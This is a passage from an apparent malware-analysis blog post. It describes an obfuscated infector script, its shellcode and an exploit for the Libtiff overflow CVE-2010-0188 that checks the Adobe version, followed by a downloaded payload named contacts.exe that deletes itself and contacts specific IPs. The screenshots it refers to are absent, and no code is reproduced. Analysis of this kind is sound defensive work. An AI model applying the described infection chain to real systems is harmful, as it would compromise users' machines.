The red mark is the evil script, where the purple mark is the long obfuscation var/array, and the yellow mark is the deobfuscator logic. Following the usual method to decode this, we'll find the infector script burped as per first upper part below, marked area is the shellcode in text: 
And the lower part which having Libtiff overflow CVE-2010-0188 exploit code: 
*) Noted: I marked the part it checked the Adobe version. Well shortly the shellcode will look like below, contains the payload's url: 
Well, I just downloaded it.. 
*)Noted: I marked my local time of my PC when I fetched. Nothing special about the file's looks & dull-usual name of contacts.exe 
Internet access command -2- get the counter... 
↑oh.. is an image file.. a counter↓ 
The execution of CMD for self (copy+)deletion.. It requests the DNS query to the google, AND to these specific IP!↓ 
